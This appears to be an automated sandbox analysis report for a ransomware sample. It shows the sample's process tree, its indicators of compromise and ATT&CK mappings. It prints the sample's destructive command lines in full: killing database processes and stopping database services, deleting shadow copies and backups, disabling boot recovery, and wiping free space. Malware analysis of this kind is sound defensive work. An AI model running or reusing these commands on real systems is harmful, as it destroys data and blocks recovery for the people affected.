2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2500	taskkill.exe
Token: SeDebugPrivilege	2376	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	1488	taskkill.exe
Token: SeDebugPrivilege	1508	taskkill.exe
Token: SeDebugPrivilege	288	taskkill.exe
Token: SeDebugPrivilege	1612	taskkill.exe
Token: SeDebugPrivilege	2300	taskkill.exe
Token: SeDebugPrivilege	1748	taskkill.exe
Token: SeDebugPrivilege	840	taskkill.exe
Token: SeDebugPrivilege	2564	taskkill.exe
Token: SeDebugPrivilege	564	taskkill.exe
Token: SeIncreaseQuotaPrivilege	760	WMIC.exe
Token: SeSecurityPrivilege	760	WMIC.exe
Token: SeTakeOwnershipPrivilege	760	WMIC.exe
Token: SeLoadDriverPrivilege	760	WMIC.exe
Token: SeSystemProfilePrivilege	760	WMIC.exe
Token: SeSystemtimePrivilege	760	WMIC.exe
Token: SeProfSingleProcessPrivilege	760	WMIC.exe
Token: SeIncBasePriorityPrivilege	760	WMIC.exe
Token: SeCreatePagefilePrivilege	760	WMIC.exe
Token: SeBackupPrivilege	760	WMIC.exe
Token: SeRestorePrivilege	760	WMIC.exe
Token: SeShutdownPrivilege	760	WMIC.exe
Token: SeDebugPrivilege	760	WMIC.exe
Token: SeSystemEnvironmentPrivilege	760	WMIC.exe
Token: SeRemoteShutdownPrivilege	760	WMIC.exe
Token: SeUndockPrivilege	760	WMIC.exe
Token: SeManageVolumePrivilege	760	WMIC.exe
Token: 33	760	WMIC.exe
Token: 34	760	WMIC.exe
Token: 35	760	WMIC.exe
Token: SeBackupPrivilege	1760	vssvc.exe
Token: SeRestorePrivilege	1760	vssvc.exe
Token: SeAuditPrivilege	1760	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2460 wrote to memory of 2484	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 2484	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 2484	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 2484	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2484 wrote to memory of 2588	2484	cmd.exe	cmd.exe
PID 2484 wrote to memory of 2588	2484	cmd.exe	cmd.exe
PID 2484 wrote to memory of 2588	2484	cmd.exe	cmd.exe
PID 2484 wrote to memory of 2588	2484	cmd.exe	cmd.exe
PID 2460 wrote to memory of 2628	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 2628	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 2628	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 2628	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2628 wrote to memory of 2532	2628	cmd.exe	cmd.exe
PID 2628 wrote to memory of 2532	2628	cmd.exe	cmd.exe
PID 2628 wrote to memory of 2532	2628	cmd.exe	cmd.exe
PID 2628 wrote to memory of 2532	2628	cmd.exe	cmd.exe
PID 2532 wrote to memory of 2500	2532	cmd.exe	taskkill.exe
PID 2532 wrote to memory of 2500	2532	cmd.exe	taskkill.exe
PID 2532 wrote to memory of 2500	2532	cmd.exe	taskkill.exe
PID 2460 wrote to memory of 2728	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 2728	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 2728	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 2728	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2728 wrote to memory of 2572	2728	cmd.exe	cmd.exe
PID 2728 wrote to memory of 2572	2728	cmd.exe	cmd.exe
PID 2728 wrote to memory of 2572	2728	cmd.exe	cmd.exe
PID 2728 wrote to memory of 2572	2728	cmd.exe	cmd.exe
PID 2572 wrote to memory of 2512	2572	cmd.exe	taskkill.exe
PID 2572 wrote to memory of 2512	2572	cmd.exe	taskkill.exe
PID 2572 wrote to memory of 2512	2572	cmd.exe	taskkill.exe
PID 2460 wrote to memory of 2544	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 2544	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 2544	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 2544	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2544 wrote to memory of 2424	2544	cmd.exe	cmd.exe
PID 2544 wrote to memory of 2424	2544	cmd.exe	cmd.exe
PID 2544 wrote to memory of 2424	2544	cmd.exe	cmd.exe
PID 2544 wrote to memory of 2424	2544	cmd.exe	cmd.exe
PID 2424 wrote to memory of 2376	2424	cmd.exe	taskkill.exe
PID 2424 wrote to memory of 2376	2424	cmd.exe	taskkill.exe
PID 2424 wrote to memory of 2376	2424	cmd.exe	taskkill.exe
PID 2460 wrote to memory of 2440	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 2440	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 2440	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 2440	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2440 wrote to memory of 2820	2440	cmd.exe	cmd.exe
PID 2440 wrote to memory of 2820	2440	cmd.exe	cmd.exe
PID 2440 wrote to memory of 2820	2440	cmd.exe	cmd.exe
PID 2440 wrote to memory of 2820	2440	cmd.exe	cmd.exe
PID 2820 wrote to memory of 1572	2820	cmd.exe	taskkill.exe
PID 2820 wrote to memory of 1572	2820	cmd.exe	taskkill.exe
PID 2820 wrote to memory of 1572	2820	cmd.exe	taskkill.exe
PID 2460 wrote to memory of 1664	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 1664	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 1664	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 2460 wrote to memory of 1664	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe
PID 1664 wrote to memory of 2160	1664	cmd.exe	cmd.exe
PID 1664 wrote to memory of 2160	1664	cmd.exe	cmd.exe
PID 1664 wrote to memory of 2160	1664	cmd.exe	cmd.exe
PID 1664 wrote to memory of 2160	1664	cmd.exe	cmd.exe
PID 2160 wrote to memory of 1488	2160	cmd.exe	taskkill.exe
PID 2160 wrote to memory of 1488	2160	cmd.exe	taskkill.exe
PID 2160 wrote to memory of 1488	2160	cmd.exe	taskkill.exe
PID 2460 wrote to memory of 828	2460	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe	cmd.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exef584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1204

C:\Users\Admin\AppData\Local\Temp\f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
"C:\Users\Admin\AppData\Local\Temp\f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Adds Run key to start application
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2460

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
3⤵
- Suspicious use of WriteProcessMemory
PID:2484

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
4⤵
PID:2588

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2628

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2532

C:\Windows\system32\taskkill.exe
taskkill -f -im sqlbrowser.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2500

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2728

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2572

C:\Windows\system32\taskkill.exe
taskkill -f -im sql writer.exe
5⤵
- Kills process with taskkill
PID:2512

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2544

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2424

C:\Windows\system32\taskkill.exe
taskkill -f -im sqlserv.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2376

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2440

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2820

C:\Windows\system32\taskkill.exe
taskkill -f -im msmdsrv.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1664

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2160

C:\Windows\system32\taskkill.exe
taskkill -f -im MsDtsSrvr.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1488

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
3⤵
PID:828

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
4⤵
PID:1452

C:\Windows\system32\taskkill.exe
taskkill -f -im sqlceip.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1508

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
3⤵
PID:1200

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
4⤵
PID:2284

C:\Windows\system32\taskkill.exe
taskkill -f -im fdlauncher.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:288

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
3⤵
PID:1648

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
4⤵
PID:2180

C:\Windows\system32\taskkill.exe
taskkill -f -im Ssms.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
3⤵
PID:812

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
4⤵
PID:2296

C:\Windows\system32\taskkill.exe
taskkill -f -im SQLAGENT.EXE
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2300

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
3⤵
PID:1712

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
4⤵
PID:2620

C:\Windows\system32\taskkill.exe
taskkill -f -im fdhost.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1748

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
3⤵
PID:2164

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
4⤵
PID:2336

C:\Windows\system32\taskkill.exe
taskkill -f -im ReportingServicesService.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:840

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
3⤵
PID:844

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
4⤵
PID:2724

C:\Windows\system32\taskkill.exe
taskkill -f -im msftesql.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2564

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
3⤵
PID:2676

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
4⤵
PID:584

C:\Windows\system32\taskkill.exe
taskkill -f -im pg_ctl.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:564

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
3⤵
PID:324

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
4⤵
PID:2244

C:\Windows\system32\taskkill.exe
taskkill -f -impostgres.exe
5⤵
- Kills process with taskkill
PID:2000

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
3⤵
PID:600

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
4⤵
PID:1928

C:\Windows\system32\net.exe
net stop MSSQLServerADHelper100
5⤵
PID:2732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
6⤵
PID:3004

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
3⤵
PID:3052

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
4⤵
PID:440

C:\Windows\system32\net.exe
net stop MSSQL$ISARS
5⤵
PID:2556

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$ISARS
6⤵
PID:2028

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
3⤵
PID:2880

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
4⤵
PID:848

C:\Windows\system32\net.exe
net stop MSSQL$MSFW
5⤵
PID:1268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$MSFW
6⤵
PID:1220

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
3⤵
PID:2316

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
4⤵
PID:1252

C:\Windows\system32\net.exe
net stop SQLAgent$ISARS
5⤵
PID:1312

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ISARS
6⤵
PID:1532

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
3⤵
PID:1688

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
4⤵
PID:1820

C:\Windows\system32\net.exe
net stop SQLAgent$MSFW
5⤵
PID:1144

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$MSFW
6⤵
PID:528

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
3⤵
PID:1232

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
4⤵
PID:960

C:\Windows\system32\net.exe
net stop SQLBrowser
5⤵
PID:1244

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLBrowser
6⤵
PID:912

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
3⤵
PID:924

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
4⤵
PID:2964

C:\Windows\system32\net.exe
net stop REportServer$ISARS
5⤵
PID:872

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop REportServer$ISARS
6⤵
PID:2788

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
3⤵
PID:1720

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
4⤵
PID:2032

C:\Windows\system32\net.exe
net stop SQLWriter
5⤵
PID:1864

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLWriter
6⤵
PID:3000

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
3⤵
PID:2036

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
4⤵
PID:1484

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
3⤵
PID:1632

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
4⤵
PID:2960

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
3⤵
PID:644

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
4⤵
PID:2480

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
3⤵
PID:884

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
4⤵
PID:2500

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
5⤵
- Modifies boot configuration data using bcdedit
PID:2144

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
3⤵
PID:3028

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
4⤵
PID:2372

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoverynabled No
5⤵
- Modifies boot configuration data using bcdedit
PID:1492

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
3⤵
PID:2200

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
4⤵
PID:2384

C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
5⤵
PID:2272

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
3⤵
PID:2204

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
4⤵
PID:2508

C:\Windows\SysWOW64\cipher.exe
cipher /w:\\?\F:
3⤵
- Enumerates connected drives
PID:2496

C:\Windows\SysWOW64\cipher.exe
cipher /w:\\?\C:
3⤵
PID:1432

C:\Windows\SysWOW64\cipher.exe
cipher /w:\\?\A:
3⤵
- Enumerates connected drives
PID:2544

C:\Users\Admin\AppData\Local\Temp\f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe
\\?\C:\Users\Admin\AppData\Local\Temp\f584c124d92b09ba12d2538d52300dc38ef255c6ad23c30e7569ff1920388c50.exe -network
2⤵
- Adds Run key to start application
- System policy modification
PID:2240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c pause
3⤵
PID:2712

C:\Windows\system32\wbadmin.exe
wbadmin delete backup -keepVersion:0 -quiet
1⤵
- Deletes system backups
PID:308

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
1⤵
- Interacts with shadow copies
PID:1696

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe SHADOWCOPY /nointeractive
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:760

C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
1⤵
- Deletes System State backups
- Drops file in Windows directory
PID:1400

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1760

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_F_COL.HXK
Filesize
1KB

MD5
0605452783ebb2153555a147d2754df0

SHA1
b9ec7210895c2fe976eac3d86866d119e7dfffaf

SHA256
62f61c5466401464be26d14fb25cc94c40e879587ebe09f89236e842dad9b45a

SHA512
4cb83912ebd56acc763c0fdd154b968ca156231978f1961e8d38930408942da393adfd7a097a5e7dcb0733ea835f8b66228db0ff056cea1ecb338774b84c7787

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_K_COL.HXK
Filesize
1KB

MD5
bbeb946848836652cfe8518077892dce

SHA1
8e5bbcc4fc789f13af3cc0c2655fa4ef4e7b51e5

SHA256
17f851fe04c204a12131597fa0d3e53bfb2e3ade99a2efb212bada5f16fb8a0c

SHA512
